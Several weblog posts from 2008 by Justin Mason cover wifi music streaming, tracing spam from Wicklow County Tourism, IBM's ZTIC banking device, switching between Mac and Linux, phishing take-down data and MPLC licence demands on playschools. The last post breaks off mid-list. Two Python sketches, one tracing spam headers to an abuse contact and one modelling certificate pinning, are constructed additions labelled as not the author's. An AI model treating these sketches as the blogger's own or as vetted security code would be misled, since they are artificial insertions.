
Author: Justin

Justin Mason, the author of this weblog.

Listening to music over wifi?

Hey lazyweb! Long time, no write.

I'm wondering what setup people use to deal with the following situation. Upstairs, I have an Ubuntu 8.04 server with 71GB of MP3s. Downstairs, I have a stereo system. In between the two is a wireless network. How can I listen to the music downstairs, without simply copying the lot (or subsets thereof) onto a local disk on some appliance down there?

Currently, I'm using a VNC client on a Nokia 770 to control a JuK window on the server. This works great, believe it or not! KDE 3 can be coaxed into providing a fantastic UI for a small touchscreen. This then uses Pulseaudio to transmit the sound output using the ESD protocol over TCP to the ESD server on the N770, and the N770 plays back the sound.

Until a few months ago, this worked great. However, something (either hardware changes, network topology changes, or an upgrade to Ubuntu 8.04 on the server) has resulted in effective bitrates between the server and the N770 dropping frequently -- hence the audio drops out or changes pitch, rendering it unlistenable :(

I've tried using UPNP servers (specifically mediatomb, ushare, and Twonkymedia), with the built-in Media Streamer app on the N770. All fail. MP3s cut off near the end, M3U playlists aren't supported, and sometimes Media Streamer just locks up. In addition it's pretty messy trying to get the UPNP servers to notice changes to the MP3 collection.

I've also tried using Squeezecenter (nee Slimserver), but the MP3 stream playback support on the N770 is pretty atrocious; there are audible decoding artifacts.

So -- anyone got a suggestion? Even something involving iTunes might be helpful -- as long as it can at least preserve the Linux server. I'm unlikely to host the full MP3 collection on anything else...

Recession Hits The Digital Depot

The Digital Depot is 'an innovative, state-of-the-art building specifically designed to meet the needs of fast growing digital media companies [...] developed as a joint initiative of Enterprise Ireland, Dublin City Council and The Digital Hub Development Agency.' Generally, it's a pretty nice place to work, and a great resource for startups and small tech companies.

However, recently, it looks like they've been embarking on some innovative, state-of-the-art cost-cutting exercises.

There's a little canteen area, for companies to make tea and coffee, wash up their mugs, etc. Check out this snapshot from the canteen this morning, courtesy of JK's phone cam:

Notice anything odd about that bottle of washing-up liquid?

Yum yum! Nothing nicer than washing your mug with a dash of toilet cleaner.

Dumb eco-questions you were afraid to ask

New Scientist have a great article up this week entitled 'Dumb eco-questions you were afraid to ask', including:

Q: Does switching from bus to bike really have any effect? After all, cycling isn't completely carbon neutral because I've got to eat to fuel my legs.

A: You are much better off cycling. A 12-kilometre round commute on a bus or subway train is reckoned to generate 164 kilograms of carbon per commuter per year. Somebody cycling that distance would burn about 50,000 calories a year - roughly the amount of energy in 22 kilograms of brown bread. A kilo of brown bread has a carbon footprint of about 1.1 kilograms, so switching from public transport to a bike saves about 140 kilograms of carbon emissions per year -- although this only really works if enough people cycle to allow public transport providers to reduce the number of buses and trains they run.

Also included: 'How clean does the pizza box/can/bottle have to be for it to be recyclable?'; 'Are laminated juice cartons recyclable?'; 'What's worse, the CO2 put out by a gas-fuelled car or the environmental effects of hybrid-car batteries?'; 'Can I put window envelopes in the paper recycling?' and many more. Check it out...

VisitWicklow.ie: Spammers

I think I just got my first spam from a government body! Specifically, VisitWicklow.ie spam from Wicklow County Tourism. It says:

Wicklow County Tourism is launching its sparkling 2008 Christmas campaign this month, with an extensive festive section on our website www.visitwicklow.ie/xmas . Here you will find all the information you need about what is happening in the Garden County this season including Christmas parties, seasonal events, carol singing, festive markets, Santa visits, great accommodation packages etc.

It was sent to a spamtrap address, scraped from an old mail archive. This address is a dedicated spamtrap; I've never used it for non-spam-trapping purposes, nor has it ever opted-in to receive mail. So there was no question that I granted permission to anyone to mail it.

The address delivers mail to my personal account -- that's what I do with my spamtraps, until their volumes get too high. So it still qualifies as a "personal email address". Here's the full spam with all headers intact.

It appears the message originated at IP address 87.192.126.62:

inetnum:        87.192.126.32 - 87.192.126.63
netname:        IBIS-PA-NET
descr:          BreezeMax-KilpooleHill-Comm-E 3MB 24:1 (2)
country:        IE
admin-c:        IRA6-RIPE
tech-c:         IRA6-RIPE
status:         Assigned PA
remarks:        Please do NOT send abuse complaints to the contacts listed.
remarks:        Please check remarks on individual inetnum records for abuse contacts, or
remarks:        failing that email abuse reports to abuse@irishbroadband.ie.
mnt-by:         IBIS-MNT
source:         RIPE # Filtered

Kilpoole Hill appears to be south of Wicklow town, just the right spot for a wireless tower used for Irish Broadband access from The Murrough, Wicklow Town (mentioned as the address for Wicklow County Tourism in the mail).
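One way to reproduce the trace described above, added here as an illustration and not part of the original post: walk the Received chain from the newest header down, stop at the first peer that is not one of the recipient's own relays (anything below that line could have been written by the sender), then check the address against the RIPE inetnum range and pull the abuse contact out of the remarks. The sample message, its hostnames and the OWN_RELAYS set are constructed; only 87.192.126.62 and the whois fields come from the post, and the parser assumes IPv4.

```python
import ipaddress
import re
from email import message_from_string

# Constructed sample. Only 87.192.126.62 comes from the post; every hostname
# and the other addresses (RFC 5737 documentation ranges) are made up.
# The last Received header stands for one the sender inserted itself.
SAMPLE_MESSAGE = """\
Received: from mx.trap.example (mx.trap.example [192.0.2.10])
    by mail.home.example with ESMTP; Mon, 1 Dec 2008 10:00:03 +0000
Received: from office-pc (unknown [87.192.126.62])
    by mx.trap.example with SMTP; Mon, 1 Dec 2008 10:00:02 +0000
Received: from bank.example (bank.example [203.0.113.99])
    by relay.invalid with SMTP; Mon, 1 Dec 2008 09:59:00 +0000
Subject: constructed sample

(body omitted)
"""

# Hypothetical: the receiving side's own relays, identified by IP address.
OWN_RELAYS = {ipaddress.ip_address("192.0.2.10")}

# Fields copied from the RIPE record quoted in the post.
WHOIS_RECORD = """\
inetnum:        87.192.126.32 - 87.192.126.63
netname:        IBIS-PA-NET
remarks:        Please do NOT send abuse complaints to the contacts listed.
remarks:        Please check remarks on individual inetnum records for abuse contacts, or
remarks:        failing that email abuse reports to abuse@irishbroadband.ie.
"""

PEER_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def handoff_ip(raw_message, own_relays):
    """Return the first peer IP outside our own infrastructure.

    Received headers are prepended, so the first one is the newest. A header
    is only trustworthy if one of our relays wrote it, which is the case as
    long as every peer seen so far was one of ours.
    """
    msg = message_from_string(raw_message)
    for header in msg.get_all("Received", []):
        match = PEER_IP_RE.search(header)
        if match is None:
            return None  # chain cannot be followed any further
        peer = ipaddress.ip_address(match.group(1))
        if peer not in own_relays:
            return peer  # external host that handed the mail to us
    return None


def parse_rpsl(text):
    """Parse 'key: value' whois lines into {key: [values...]}."""
    record = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip():
            record.setdefault(key.strip(), []).append(value.strip())
    return record


def inetnum_networks(record):
    """Convert the 'first - last' inetnum range into CIDR networks."""
    first, last = (ipaddress.ip_address(part.strip())
                   for part in record["inetnum"][0].split("-"))
    return list(ipaddress.summarize_address_range(first, last))


def abuse_contacts(record):
    """Extract e-mail addresses mentioned in the remarks lines."""
    return EMAIL_RE.findall(" ".join(record.get("remarks", [])))


def report_target(raw_message, own_relays, whois_text):
    """Tie the hand-off IP to the whois record, or return None if they differ."""
    ip = handoff_ip(raw_message, own_relays)
    record = parse_rpsl(whois_text)
    if ip is None or not any(ip in net for net in inetnum_networks(record)):
        return None
    return {
        "ip": str(ip),
        "netname": record["netname"][0],
        "abuse": abuse_contacts(record),
    }


if __name__ == "__main__":
    print(report_target(SAMPLE_MESSAGE, OWN_RELAYS, WHOIS_RECORD))
```

The address in the third, sender-supplied header is never consulted, which is why a forged Received line cannot redirect the complaint.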

Suggestions? Did anyone else get this? How do I report spam sent by the Wicklow County Tourism Board?

Update: they also hit the Irish Linux User's Group submission address. I wouldn't be surprised if they scraped the addresses of other ILUG subscribers, then...

Déjà Joué

James Tauber just mentioned on Twitter:

“is it bad that I just saw a photo of Stockholm and immediately recognized a stretch of road from PGR2, rather than when I was actually there?”

This is something I've been thinking about recently. As game graphics improve, the realism levels become close enough to fool our brains into creating something like "real-world" memories for the worlds we're experiencing in gameplay.

For example, when I visited California for the first time, I was stunned by the feelings of familiarity I felt in response to stuff I'd experienced while playing the super-realistic Grand Theft Auto: Vice City; little things like the way traffic lights were mounted above the road, the design of the curbs, etc., the level of detail for which Rockstar received a "Designer of the Year" nomination -- because of this, the streetscape of a typical Californian street was instantly familiar to me.

The same thing happened this weekend, watching footage on TV of Arizona's Monument Valley. Naturally, I've driven a dirt bike around Grand Theft Auto: San Andreas' version of this. ;)

Update: another one is the Pripyat level of Call of Duty 4, which would be extremely familiar to anyone viewing these photos from a real-life visit.

I think this phenomenon needs its own name. "déjà vu" is similar, but different -- that phenomenon occurs when the memory feels erroneously that an experience has previously happened, whereas in this case, the experience has happened -- albeit virtually.

I've come up with a phrase to describe this: "déjà joué". (In French, that's "already played", analogous to the "already seen" of "déjà vu".)

What do you reckon? If you like it, feel free to use it ;)

IBM’s ZTIC

IBM Zone Trusted Information Channel (ZTIC) -- 'a banking server's display on your keychain'.

IBM has introduced the Zone Trusted Information Channel (ZTIC), a hardware device that can counter [malware attacks on online banking] in an easy-to-use way. The ZTIC is a USB-attached device containing a display and minimal I/O capabilities that runs the full TLS/SSL protocol, thus entirely bypassing the PC's software for all security functionality.

The ZTIC achieves this by registering itself as a USB Mass Storage Device (thus requiring no driver installation) and starting a "pass-through" proxy configured to connect with pre-configured (banking) Websites. After starting the ZTIC proxy, the user opens a Web browser to establish a connection with the bank's Website via the ZTIC. From that moment on, all data transmitted between browser and server pass through the ZTIC; the SSL session is protected by keys maintained only on the ZTIC and, hence, is inaccessible to malware on the PC [...].

In addition, all critical transaction information, such as target account numbers, is automatically detected in the data stream between browser and ZTIC. This critical information is then displayed on the ZTIC for explicit user confirmation: Only after pressing the "OK" button does the TLS/SSL connection continue. If any malware on the PC has inserted incorrect transaction data into the browser, it can be easily detected by the user at this moment.

This seems like quite a nice implementation, I think.

However, key management will be problematic. Each server's public key will need to be stored on the ZTIC, and not be writable/modifiable by the possibly-infected PC, otherwise the "bad guys" could simply insert a cert for a malware proxy server on the PC and perform a man-in-the-middle attack on the TLS session. But for that to be viable, the SSL certs need to change very infrequently, or some new secure procedure to update the certs from a "safe" machine needs to be put in place. Tricky....
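The key-management trade-off above, as an added sketch (not IBM's design and not code from the original post): a device-side pin store that rejects any server key it has not pinned, and changes its pins only through an authenticated, versioned update. HMAC with a key provisioned on the device stands in for whatever signature scheme a real device would use; the class, function and host names and all key bytes are hypothetical and constructed.

```python
import hashlib
import hmac
import json


def key_pin(public_key_der):
    """Pin = SHA-256 of the server's public key bytes (constructed here)."""
    return hashlib.sha256(public_key_der).hexdigest()


def make_update(update_key, version, pins):
    """Build a pin bundle and its tag, as the 'safe' machine would."""
    bundle = json.dumps({"version": version, "pins": pins},
                        sort_keys=True).encode()
    tag = hmac.new(update_key, bundle, hashlib.sha256).hexdigest()
    return bundle, tag


class PinStore:
    """Models storage the attached PC can read from but cannot write."""

    def __init__(self, update_key, pins, version=1):
        self._update_key = update_key
        self._pins = {host: set(values) for host, values in pins.items()}
        self._version = version

    def handshake_allowed(self, host, presented_key_der):
        """Accept the TLS peer only if its key is pinned for this host."""
        return key_pin(presented_key_der) in self._pins.get(host, set())

    def apply_update(self, bundle, tag):
        """Replace the pins only for an authentic bundle with a newer version."""
        expected = hmac.new(self._update_key, bundle,
                            hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, tag):
            return False  # not produced by the holder of the update key
        update = json.loads(bundle)
        if update["version"] <= self._version:
            return False  # replay of an old bundle (rollback)
        self._pins = {h: set(p) for h, p in update["pins"].items()}
        self._version = update["version"]
        return True


def run_scenario():
    """Walk through the cases from the paragraph above; returns the outcomes."""
    host = "bank.example"                        # constructed host name
    update_key = b"constructed update key"       # provisioned on the device
    bank_old = b"constructed key bytes: bank, current"
    bank_new = b"constructed key bytes: bank, after rotation"
    proxy = b"constructed key bytes: proxy on the PC"
    store = PinStore(update_key, {host: [key_pin(bank_old)]})
    out = {}
    out["genuine_server"] = store.handshake_allowed(host, bank_old)
    out["proxy_on_pc"] = store.handshake_allowed(host, proxy)
    # The PC tries to add its own key without knowing the update key.
    bundle, tag = make_update(b"wrong key", 2, {host: [key_pin(proxy)]})
    out["unauthenticated_update"] = store.apply_update(bundle, tag)
    # The bank rotates its key before the device has been updated.
    out["rotated_before_update"] = store.handshake_allowed(host, bank_new)
    bundle, tag = make_update(update_key, 2, {host: [key_pin(bank_new)]})
    out["authenticated_update"] = store.apply_update(bundle, tag)
    out["rotated_after_update"] = store.handshake_allowed(host, bank_new)
    # Replaying the old, validly tagged bundle must not restore the old pin.
    bundle, tag = make_update(update_key, 1, {host: [key_pin(bank_old)]})
    out["rollback"] = store.apply_update(bundle, tag)
    return out


if __name__ == "__main__":
    for case, allowed in run_scenario().items():
        print(f"{case:24} {'accepted' if allowed else 'rejected'}")
```

The `rotated_before_update` case is the availability cost of pinning: a legitimate key change locks the user out until an authenticated update reaches the device.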

Linux: It Just Works

Here's a nice little (totally subjective!) story for Linux users.

At home, I have a HP Laserjet 1018 printer; it's a dinky little USB laser. When I was setting up my Mac running OSX, I attempted to use it.

A common refrain from Mac users is that MacOS X just works -- attempt to get something working, and the Mac will do the right thing with little friction, compared to the Linux situation which will involve complex config file editing and what-not. If this experience is anything to go by, that's not entirely the case anymore. In fact, the exact opposite applied; when I plugged the printer into the Linux box and ran System -> Administration -> Printing -> New Printer, it "just worked" and I wound up with a working network printer within seconds. No such luck with OSX. Some googling revealed the problem:

In summary, the LJ1018 is just not supported on MacOS X. In order to get it working you need to install a third-party port of the Linux printing components foo2zjs, Foomatic, and Ghostscript, ported to MacOS X, and then get busy with the config file editing and undocumented tweaking and what-not. Ouch.

So there you go. Linux: it just works! ;)

(By the way, I was able to work around it by printing from the Mac to the Linux print server in Postscript; the CUPS print server will transcode PS to the native format.)

The horror! the horror!

Dead Space came out last week, just in time for Hallowe'en. It's a survival-horror first-person shooter, set in space:

In the bold and often-bloody Dead Space, gamers step into a third-person sci-fi survival horror experience that delivers psychological thrills and gruesome action. Set in the cold blackness of deep space, the atmosphere is soaked with a feeling of tension, dread and sheer terror. In Dead Space, players step into the role of engineer Isaac Clarke – an ordinary man on a seemingly routine mission to fix the communications systems aboard a deep space mining ship. It is not long before Isaac awakes to a living nightmare when he learns that the ship's crew has been ravaged by a vicious alien infestation. He must fight through the dead silence and darkness of deep space to stay alive.

I absolutely love this genre. If you ask me, Resident Evil 4 is one of the best games ever written; perfectly paced, with some truly terrifying villains, plot twists and tension-laden surprises along the way. There's no experience in computer gaming quite so viscerally terrifying as the first time you hear Dr. Salvador's chainsaw revving up in the distance, while trapped in a farmhouse under siege from an army of blood-crazed cultists...

So I got Dead Space last Friday, and have been playing it over the weekend; it's good. Problem is, it's not as good as RE4, but then, when you're up against the best game ever, that's going to be hard to avoid. Actually, to be honest, the first couple of stages feel very reminiscent of RE4, tending towards derivative. Stage 3, however, comes into its own, with flavours of Aliens. Fingers crossed the upward trend continues...

Reading the comments on a Slashdot thread about the game, I came across this tip:

Call of Cthulhu (Score:5, Informative)

I'd say this is the last game that scared the shit out of me. The fact that you don't have any health bar, and that your vision, hearing, and even your heartbeat and breathing pace are affected by the situation can really frighten you. I don't think this game got enough credit. I still haven't finished the game yet.

Here's a nice 10 minute video that gives you the general feeling of the whole game. (minus the 320x240 resolution and lossy quality of course). If you get bored skip to the middle.

The video is pretty compelling, so I did some research. It seems the game is still playable on XBox360, albeit with some wonky sound samples during dialogue. Sounds ok to me. I went onto eBay, and was able to find a copy for 8 UK pounds. Bargain!

When I twittered about this, I got these responses:

Me: "Call of Cthulhu" 2005 Xbox title, apparently one of the most terrifying games ever written: 8 UK quid on eBay. woot.

Myles at 2:00pm October 23: You won't be saying woot when your sanity dwindles and you gnaw off your own fingers in an attempt to protect yourself from the Great Old One. [a fair point]

Andrew at 6:56pm October 23: Have you ever played Eternal Darkness for the Gamecube? Really really creepy, and as close to Cthulhu as you can get without paying royalties.

Síofra at 9:06pm October 23: Eternal Darkness - feckin' brilliant. My first videogame addiction and I remember it fondly. The darkness comes....

So I looked up Eternal Darkness: Sanity's Requiem, too. Check this review out:

Resident Evil, this game is most absolutely not. What it is, however, to dedicated players who fully explore its length and intricacies, is one of GameCube's absolute best games, and indeed one of the greatest titles we've ever played. [...]

There are insanity effects -- hallucinations that have a major role within the game. [...] if a character's sanity bar drops too low, strange things will begin to happen. Very strange things sometimes. These occurrences are sure to set the dark mood of the adventure and have an impact on the play experience. Going insane too much can create unwanted obstacles for players and in doing so may also endanger one's health and magick supplies. Some of the insanity effects we've encountered have proven very disturbing. Some even attempt to pick at the mind of the player outside of the game universe.

Apparently the walls drip with blood when you start losing your mind. Awesome! IGN gave the game 9.6 out of 10, Metacritic gives it 9th position, 92/100, "universal acclaim", on the all-time high scores list for the Gamecube, and of course, it's playable on the Wii.

Rosco has already promised I can borrow his copy. Sign me up! Looks like I'll be scaring the crap out of myself for a while to come...

the on-demand Windows desktop

A few days ago, Amazon announced that they would be supporting Windows on EC2. IMO, you'd have to be mad to dream of running a server on that platform, so I was totally like "meh".

However, James Murty pointed out the perfect use case that I'd missed:

Although I much prefer “Unixy” platforms for my own development, I can imagine situations where it would be very handy to have a Windows machine easily available — such as for running those vital but irritating programs that are only made available for Windows. Australian Tax Office, I’m looking at you...

He's spot on! This is a great use case. If you need to do a little 'doze work, a quick recompile, or a connect to another stupid platform-limited service -- indeed, like the Irish tax office's Revenue Online Service, for that matter -- simply fire up a 'doze instance, do your hour's work, SDelete any private files, and shut it down again. All of that will cost 12.5 cents.

This will save me a lot of pain with VMWare, I suspect...

More techie details at RightScale; a trial run.

Switch, ep. 3: revert!

So, that OSX thing. I'm afraid I've given up on the switch; I'm back on Linux. :(

I got the keyboard mapping working, but Focus-Follows-Mouse and the couple of window-management hotkeys I rely on were impossible to work around.

Focus-Follows-Mouse is emulated by iTerm, but every time you switch to an X11 app or to Firefox, a click is required. This app-specific behaviour is jarring and inconsistent.

For some reason, the window-management hotkeys had a tendency to break, or to be disabled by other hotkeys or apps. I never figured out exactly why.

In addition, OSX has a built-in tendency to hibernate once the laptop's lid is closed. I wanted to disable this, for a number of reasons; most importantly, I tend to leave the laptop closed, leaning beside a chair in the TV room, while I'm at work, but there's frequently something I want to SSH in for. I tried Caffeine.app to avoid this, but it failed entirely on my hardware. InsomniaX generally works, but for some reason it tends to turn itself off occasionally for rather random reasons (such as switching to battery power, no matter how briefly, then back again). This was the final straw.

So just over a week ago, I installed Ubuntu on the MacBook Pro, following the documentation on the Ubuntu Wiki. Everything worked!

The Wiki's suggestions were a little hairy to configure -- but then, the OSX experience had been, if anything, less easy. Plus, I know my way around a Linux /etc.

On the Linux side, the Avant Window Navigator is truly excellent, and rivals the Dock nicely, and the Baghira kwin theme gives a pretty good OSX sheen to KDE 3. It's not quite as pretty as OSX, but I'm happy to lose some prettiness for better usability.

Regarding the interface -- the current version of the Linux Synaptics driver supports multi-touch (Apple's patents be damned, seemingly), and all the nice multi-touch tricks supported by most OSX apps work with it too. I'm still working out the optimum settings for this, but it's very configurable, and quite open.

It's fantastic ;) I feel like I'm home again. Sorry, Mac people.

(image: CC-licensed, thanks to Dr Craig)

Bonuses for bankers: business as usual

Wall Street banks in $70bn staff payout:

Financial workers at Wall Street's top banks are to receive pay deals worth more than $70bn (£40bn) [equivalent to 10% of the US government bail-out package], a substantial proportion of which is expected to be paid in discretionary bonuses, for their work so far this year - despite plunging the global financial system into its worst crisis since the 1929 stock market crash, the Guardian has learned.

Lloyds chief tells staff: you'll still get bonuses:

The chief executive of Lloyds TSB, one of the banks participating in the [UK] £37bn bank bail-out, has promised staff they will receive bonuses this year despite Gordon Brown's promise of a crackdown on bankers' pay following the investment by taxpayers.

In a recorded message to employees, Daniels stressed that the bank faced "very, very few restrictions" in its behaviour despite the injection of up to £5.5bn of taxpayers' funds. "If you think about it, the first restriction was not to pay bonuses. Well Lloyds TSB is in fact going to pay bonuses. I think our staff have done a terrific job this year. There is no reason why we shouldn't."

Now that takes nerve.

Closed phish data costing $326mm per year

Richard Clayton posted a very interesting article over at Light Blue Touchpaper; he notes:

Tyler Moore and I are presenting another one of our academic phishing papers today at the Anti-Phishing Working Group’s Third eCrime Researchers Summit here in Atlanta, Georgia. The paper “The consequence of non-cooperation in the fight against phishing” (pre-proceedings version here) goes some way to explaining anomalies we found in our previous analysis of phishing website lifetimes. The “take-down” companies reckon to get phishing websites removed within a few hours, whereas our measurements show that the average lifetimes are a few days.

When we examined our data [...] we found that we were receiving “feeds” of phishing website URLs from several different sources — and the “take-down” companies that were passing the data to us were not passing the data to each other.

So it often occurs that take-down company A knows about a phishing website targeting a particular bank, but take-down company B is ignorant of its existence. If it is company B that has the contract for removing sites for that bank then, since they don’t know the website exists, they take no action and the site stays up.

Since we were receiving data feeds from both company A and company B, we knew the site existed and we measured its lifetime — which is much extended. In fact, it’s somewhat of a mystery why it is removed at all! Our best guess is that reports made directly to ISPs trigger removal.

They go on to estimate that 'an extra $326 million per annum is currently being put at risk by the lack of data sharing.'

This is a classic example of how the proprietary mindset fails where it comes to dealing with abuse and criminal activity online. It would be obviously more useful for the public at large if the data were shared between organisations, and published publicly, but if you view your data feed as a key ingredient of your company's proprietary "secret sauce" IP, you are not likely to publish and share it :(

The anti-phishing world appears to be full of this kind of stuff, disappointingly -- probably because of the money-making opportunities available when providing services to big banks -- but anti-spam isn't free of it either.

Mark another one up for open source and open data...

(thanks to ryanr for the pic)

solid Python queueing?

OK, message queueing has become insufferably trendy. You don't need to tell me, I've known it's the bee's knees for 4 years now ;)

The only problem is, there doesn't seem to be a good queue broker written in Python. They're in Java, Perl, more Perl, or Erlang, but a solid, reliable, persistent queueing backend in Python is nowhere to be found, as far as I can see. Work is a mainly-Python shop, and while we can deploy other languages to our production, staging and test grids easily enough, it would be a lot easier to do developer-desktop testing if we had an all-Python queue backend.

Am I missing one?

Dublinr Exhibition

Dublin is a city that, photographically at least, can be reduced to a set of clichés, but a new exhibition offers a fresh, vibrant perspective of the Irish Capital. Dublinr is organised by a group of photographers that came together through the photo sharing website Flickr.

The exhibition opens at 6.00pm on Wednesday 5 November, runs until Sunday 9, from 11:00am – 6:30pm daily, and admission is free.

The Joinery Gallery | Arbour Hill | Stoneybatter | Dublin 7.

Some fantastic local photographers, including Andy Sheridan, whose work I've been following for a couple of months now; and a good location. D7 is full of good stuff nowadays -- in fact, ever since I moved out ;)

IWA post-mortem

I didn't win a Web Award -- but then, given the competition from a couple of very professional news organisations, I really wasn't expecting to ;) Silicon Republic won, and rightly so. Good on 'em.

I had a great night nonetheless, hanging out with Vishal, Walter (who won his category!), Conor O'Neill, Jason and a bunch of others.

Thanks to Moviestar.ie and BH Consulting for their sponsorship of a great event -- marketing money well-spent, I suspect. Extra thanks to Moviestar for the freebie DVD player. And thanks of course to the mighty Mulley for organising the whole thing -- at this stage he's a finely-honed events machine!

Want to eat on RTE’s HEAT?

Here's an interesting offer -- be a restaurant critic/reviewer for RTE's cooking reality show, HEAT:

Ireland's top amateur chefs battle it out in our kitchen, each preparing a three course meal to impress the hardest critics; the paying diners. Mentored by Kevin Thornton and Kevin Dundon, these amateurs have a chance to shock or shine. Who wins, who looses (jm: sic), its all down to you. Come eat in the Heat Restaurant and decide who is Ireland's newest culinary talent.

The restaurant is located in Ely HQ, on Hanover Quay. All three course meals, inc teas and coffees are €30 pp. Drinks are separate.

To dine at Heat, please email diners /at/ loosehorse.ie or call 01 613 6052 with your contact details and your preferred evening. Heat is open for business on Sunday the 19th of October, Sunday the 26th of October, Sunday the 2nd of November, Sunday the 9th of November, and Sunday the 16th of November.

Please note: The evening is being recorded for RTE so if you want to keep a low profile, please consider. Vegetarians, strange allergies and odd requests may or may not be accommodated as Heat has a limited menu and may not always be able to accommodate specific food requirements.

Bon Appetit!

MPLC fail to shake down Irish playschools

Oh, the irony. According to The Sunday Times, a body called the Motion Picture Licensing Company sent letters to 2,500 Irish playschools (aka kindergartens), demanding payment for children watching DVDs on their premises -- a fee of EUR 3, plus 17.5% VAT, per child per year:

Playschools have been given an unexpected lesson on copyright law after a company representing Hollywood studios demanded that each child pay a fee of €3 plus 17.5% VAT per year to watch DVDs in their playgroup.

The Motion Picture Licensing Company (MPLC), which collects royalties on behalf of companies such as Walt Disney, Universal and 20th Century Fox, wrote to 2,500 playschools last month warning that it is illegal to show copyrighted DVDs in public without the correct license.

The letter was sent with the approval of the Irish Preschool Play Association (IPPA), which represents the schools and their 50,000 children. The MPLC had wanted €10 plus VAT per year for each child, but the IPPA negotiated for the lower fee.

Unsurprisingly, playschool owners are freaking out:

“To be honest, when I got the letter with the IPPA newsletter I laughed and binned it,” said Paula Doran, manager of Kiddies Korner, a community playschool in Shankill, south Dublin. “If we brought in something like that the parents would have to pick up the costs. But I don’t like the way they went about it — once you signed up they’d automatically take money out of your account every year.”

“I don’t think too many judges would come down hard on a playschool over this,” she said. “We would rarely show DVDs anyway because it’s frowned upon — kids get enough TV at home. The odd time we would pretend to go to the cinema. We give the children tickets and they watch 20 minutes of Snow White, Fireman Sam or SpongeBob.”

Here's the funny part -- it appears the MPLC failed to take note of its own legal requirements, and is not legally licensed to issue shakedown demands for fees in Ireland:

The MPLC had failed to register with the Irish Patent Office as a copyright licensing body. Under the 2000 Copyright Act, royalty collectors such as the Irish Music Rights Organisation (IMRO) and Phonographic Performance Ireland (PPI) are required to register before they can collect fees. A spokesman for the Patent Office said that if an organisation collects money but hasn’t registered it may be fined or staff may be jailed if a complaint is made and it is found guilty.

Crazily, it sounds like the IPPA didn't find this out from their own legal advisors:

Irene Gunning, IPPA’s chief executive, said she was disappointed with the MPLC. “We acted in good faith with this organisation and felt we were doing our members good by negotiating them down from €10 per child,” said Gunning. “I feel misled by them now. It is only through an alert mother that we became aware that they need to be registered.”

Oh dear. Let's hear it for alert mothers, I guess. Anyway, expect more similar shakedowns once the MPLC get their little licensing oopsie sorted out:

The MPLC only began operating in Ireland in recent months, after setting up in Britain in 2003. It is also targeting other sectors such as coach operators, which occasionally show movies in public.

More coverage at Techdirt, Ars Technica, and TorrentFreak.

(Image credit: smithco on Flickr. thanks!)

Switch ep. 2: the keyboard

Well, some bits of this are easy: here's a MacOS X version of GVim and Vim, which works nicely, is easy to install, and is simply vim/gvim. Great stuff!

But some bits are harder. Remember I was complaining about that silly ± / § key in the top corner of UK/Irish MacBook Pro keyboards? Some investigation reveals that I'm far from alone in this:

'it fucks up application switching'

'I hate my MacBook Pro'

a forum post looking for help

another forum post

There are a number of apps that offer key remapping, but for no apparent reason they limit themselves to "popular" remappings only, such as swapping the Control and Caps-Lock keys etc. I presume this is because that was easy to code ;)

The one that does work fully is Ukelele. Watch out though -- it comes with a raft of caveats. It's buggy, at least dealing with my MBP keyboard under OSX 10.5.5; the "Copy Key" functionality doesn't work, and you need to start using a key mapping file from the Ukelele package, not a system one or one you've downloaded, otherwise it'll silently produce an output file that doesn't recognise any keys at all. On top of this, each time you make changes, you need to log out and log back in again to try them out. (Small mercies: at least you don't need to do a full reboot, I suppose.)

I'm not impressed by this whole keyboard issue. If you look at photos of the US MacBook Pro keyboard, it's clear that it doesn't have the stunted tetris-style Enter and Left-Shift keys that the UK/Irish one does. It also has the tilde key in the normal place, the top left, instead of some bizarre symbol that isn't even used in this keyboard's locale, and as Ash Searle noted, when you're a developer, the # is a hell of a lot more useful than the £ symbol. They've basically screwed with a good US keyboard design to bodge in a few extra keys they needed to deal with the tricky European corner cases.

All that would be relatively minor, however, if I could remap the keys to suit my tastes -- but it was pretty damn tricky to do that. Key remapping needs to be an easy feature!

I'm still working on the fixed key layout file, but I may post it here once it's finished to save other Googlers the bother...

Update: here's the fixed key layout file:

Irish Fixed.keylayout

Save that to ~/Library/Keyboard Layouts/ , then open System Preferences -> International, select Input Menu, and choose Irish Fixed from the list, and ensure “Show input menu in the menu bar” is on. Close that window, then select “Irish Fixed” from the input menu left of the clock on the menu bar. Log out, and log back in again, and the keys should be sane…

(thanks to Sonic Julez for the MBP key image)

My Trial Switch, ep. I

As previously noted, I've just bought myself a nice shiny MacBook Pro, to replace an old reliable 5-year-old Thinkpad T40, which ran Linux.

Initially, I was contemplating installing Linux on this one too, and dual-booting. But right now, I've decided to give MacOS X a go -- why not? I find it's worthwhile updating aspects of my quotidian computing environment every now and again, and it seems everyone's doing it. ;) I'll log my experience on this blog as I go along.

(Worth noting that this isn't my first Mac; back in 1990, I was the proud owner of a free Macintosh Plus for a year, courtesy of TCD's "Project Mac" collaboration with Apple Ireland. I wrote a great Mandelbrot Set explorer app.)

First off, the good news: the hardware is very nice indeed. It's light in weight, esp. compared to my T61p work laptop, the screen clarity is fantastic, and the CPU fairly zooms along -- unsurprisingly, given that the T40 was 5 years old.

In addition, the multi-touch touchpad is wonderful; I'm looking forward to lots more multi-touch features.

Unfortunately, some of the other hardware design decisions were pretty wonky. By default it's quite tricky to keep the laptop running with the lid closed -- it seems a decision was made to use passive cooling via the keyboard, so once the lid is closed, that heat cannot escape, causing overheating. There's a third-party extension I can install to allow it anyway, but it's festooned with warnings to overclock the fan speed to make up for it... ugh. Since I need the ability to be able to remotely login to my laptop from work if I should happen to forget something, or to kick off a long transfer before I come home, this means I have to leave the laptop open permanently, which I didn't want to do.

In addition, I initially thought my brightness control was broken, since the laptop screen fluctuates in brightness continually. Turns out this is a feature, responding to ambient light -- a poorly-documented one, but at least it's easy to turn off in System Preferences once you know it's there.

(Unfortunately, a lot of MacOS seems to consist of poorly-documented features that are hidden "for my own good". The concept of switching seems to involve me abdicating a good deal of what I'd consider adult control of the machine, to the cult of Steve Who Knows Better. This is taking some getting used to.)

On to the software... what's getting my goat right now are as follows:

Inability to remap keys (CapsLock key, the useless "+-" key, a lack of "spare" keys for scripted actions)

